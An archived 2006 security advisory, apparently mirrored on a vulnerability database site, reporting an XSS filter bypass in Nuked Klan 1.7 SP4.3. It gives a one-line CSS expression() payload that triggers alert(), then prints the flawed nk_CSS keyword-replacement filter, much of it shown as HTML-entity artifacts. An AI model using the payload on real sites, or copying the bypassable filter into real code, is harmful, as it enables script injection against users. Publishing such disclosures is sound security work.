Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
securityvulnsSecurityvulnsSECURITYVULNS:DOC:14098
HistoryAug 31, 2006 - 12:00 a.m.

Nuked Klan 1.7 SP4.3 : Function Anti-XSS Bypassed

2006-08-3100:00:00
vulners.com
28
JSON

// - BEGIN -

// By Blwood
// http://blwood.net <http://blwood.net/&gt;

We can bypassed the function anti-xss called nk_CSS ( nuked.php) using
like this :

<b id="blwood" style="width:expression(alert(' http://www.blwood.net'))
<http://www.blwood.net%27%29%29/>"></b>

Here is the function :

function nk_CSS($str)

{
if ($str != "")
{
$str = eregi_replace("content-disposition:","content-disposition:",$str);

    $str = eregi_replace&#40;&quot;content-type:&quot;,&quot;&#99;&#111;&#110;&#116;&#101;&#110;&#116;&#45;&#116;&#121;&#112;&#101;&#58;&quot;,$str&#41;;
    $str = eregi_replace&#40;&quot;content-transfer-encoding:&quot;,&quot;&#99;&#111;&#110;&#116;&#101;&#110;&#116;&#45;&#116;&#114;&#97;&#110;&#115;&#102;&#101;&#114;&#45;&#101;&#110;&#99;&#111;&#100;&#105;&#110;&#103;&#58;&quot;,$str&#41;;


    $str = eregi_replace&#40;&quot;include&quot;,&quot;&#105;&#110;&#99;&#108;&#117;&#100;&#101;&quot;,$str&#41;;
    $str = eregi_replace&#40;&quot;&#92;&lt;&#92;?&quot;,&quot;&amp;lt;?&quot;,$str&#41;;
    $str = eregi_replace&#40;&quot;&lt;&#92;?php&quot;,&quot;&amp;lt;?php&quot;,$str&#41;;


    $str = eregi_replace&#40;&quot;&#92;?&#92;&gt;&quot;,&quot;?&amp;gt;&quot;,$str&#41;;
    $str = eregi_replace&#40;&quot;script&quot;,&quot;&#115;&#99;&#114;&#105;&#112;&#116;&quot;,$str&#41;;
    $str = eregi_replace&#40;&quot;eval&quot;,&quot;&#101;&#118;&#97;&#108;&quot;,$str&#41;;


    $str = eregi_replace&#40;&quot;javascript&quot;,&quot;&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&quot;,$str&#41;;
    $str = eregi_replace&#40;&quot;embed&quot;,&quot;&#101;&#109;&#98;&#101;&#100;&quot;,$str&#41;;


    $str = eregi_replace&#40;&quot;iframe&quot;,&quot;&#105;&#102;&#114;&#97;&#109;&#101;&quot;,$str&#41;;
    $str = eregi_replace&#40;&quot;refresh&quot;, &quot;&#114;&#101;&#102;&#114;&#101;&#115;&#104;&quot;, $str&#41;;


    $str = eregi_replace&#40;&quot;onload&quot;, &quot;&#111;&#110;&#108;&#111;&#97;&#100;&quot;, $str&#41;;
    $str = eregi_replace&#40;&quot;onstart&quot;, &quot;&#111;&#110;&#115;&#116;&#97;&#114;&#116;&quot;, $str&#41;;


    $str = eregi_replace&#40;&quot;onerror&quot;, &quot;&#111;&#110;&#101;&#114;&#114;&#111;&#114;&quot;, $str&#41;;
    $str = eregi_replace&#40;&quot;onabort&quot;, &quot;&#111;&#110;&#97;&#98;&#111;&#114;&#116;&quot;, $str&#41;;


    $str = eregi_replace&#40;&quot;onblur&quot;, &quot;&#111;&#110;&#98;&#108;&#117;&#114;&quot;, $str&#41;;
    $str = eregi_replace&#40;&quot;onchange&quot;, &quot;&#111;&#110;&#99;&#104;&#97;&#110;&#103;&#101;&quot;, $str&#41;;


    $str = eregi_replace&#40;&quot;onclick&quot;, &quot;&#111;&#110;&#99;&#108;&#105;&#99;&#107;&quot;, $str&#41;;
    $str = eregi_replace&#40;&quot;ondblclick&quot;, &quot;&#111;&#110;&#100;&#98;&#108;&#99;&#108;&#105;&#99;&#107;&quot;, $str&#41;;


    $str = eregi_replace&#40;&quot;onfocus&quot;, &quot;&#111;&#110;&#102;&#111;&#99;&#117;&#115;&quot;, $str&#41;;
    $str = eregi_replace&#40;&quot;onkeydown&quot;, &quot;&#111;&#110;&#107;&#101;&#121;&#100;&#111;&#119;&#110;&quot;, $str&#41;;


    $str = eregi_replace&#40;&quot;onkeypress&quot;, &quot;&#111;&#110;&#107;&#101;&#121;&#112;&#114;&#101;&#115;&#115;&quot;, $str&#41;;
    $str = eregi_replace&#40;&quot;onkeyup&quot;, &quot;&#111;&#110;&#107;&#101;&#121;&#117;&#112;&quot;, $str&#41;;


    $str = eregi_replace&#40;&quot;onmousedown&quot;, &quot;&#111;&#110;&#109;&#111;&#117;&#115;&#101;&#100;&#111;&#119;&#110;&quot;, $str&#41;;
    $str = eregi_replace&#40;&quot;onmousemove&quot;, &quot;&#111;&#110;&#109;&#111;&#117;&#115;&#101;&#109;&#111;&#118;&#101;&quot;, $str&#41;;


    $str = eregi_replace&#40;&quot;onmouseover&quot;, &quot;&#111;&#110;&#109;&#111;&#117;&#115;&#101;&#111;&#118;&#101;&#114;&quot;, $str&#41;;
    $str = eregi_replace&#40;&quot;onmouseout&quot;, &quot;&#111;&#110;&#109;&#111;&#117;&#115;&#101;&#111;&#117;&#116;&quot;, $str&#41;;


    $str = eregi_replace&#40;&quot;onmouseup&quot;, &quot;&#111;&#110;&#109;&#111;&#117;&#115;&#101;&#117;&#112;&quot;, $str&#41;;
    $str = eregi_replace&#40;&quot;onreset&quot;, &quot;&#111;&#110;&#114;&#101;&#115;&#101;&#116;&quot;, $str&#41;;


    $str = eregi_replace&#40;&quot;onselect&quot;, &quot;&#111;&#110;&#115;&#101;&#108;&#101;&#99;&#116;&quot;, $str&#41;;
    $str = eregi_replace&#40;&quot;onsubmit&quot;, &quot;&#111;&#110;&#115;&#117;&#98;&#109;&#105;&#116;&quot;, $str&#41;;


    $str = eregi_replace&#40;&quot;onunload&quot;, &quot;&#111;&#110;&#117;&#110;&#108;&#111;&#97;&#100;&quot;, $str&#41;;
    $str = eregi_replace&#40;&quot;document&quot;, &quot;&#100;&#111;&#99;&#117;&#109;&#101;&#110;&#116;&quot;, $str&#41;;


    $str = eregi_replace&#40;&quot;cookie&quot;, &quot;&#99;&#111;&#111;&#107;&#105;&#101;&quot;, $str&#41;;
    $str = eregi_replace&#40;&quot;vbscript&quot;, &quot;&#118;&#98;&#115;&#99;&#114;&#105;&#112;&#116;&quot;, $str&#41;;


    $str = eregi_replace&#40;&quot;location&quot;, &quot;&#108;&#111;&#99;&#97;&#116;&#105;&#111;&#110;&quot;, $str&#41;;
    $str = eregi_replace&#40;&quot;object&quot;, &quot;&#111;&#98;&#106;&#101;&#99;&#116;&quot;, $str&#41;;


    $str = eregi_replace&#40;&quot;vbs&quot;, &quot;&#118;&#98;&#115;&quot;, $str&#41;;
    $str = eregi_replace&#40;&quot;href&quot;, &quot;&#104;&#114;&#101;&#102;&quot;, $str&#41;;
    $str = eregi_replace&#40;&quot;src&quot;, &quot;&#115;&#114;&#99;&quot;, $str&#41;;


} 
return&#40;$str&#41;;

}

// - END -

JSON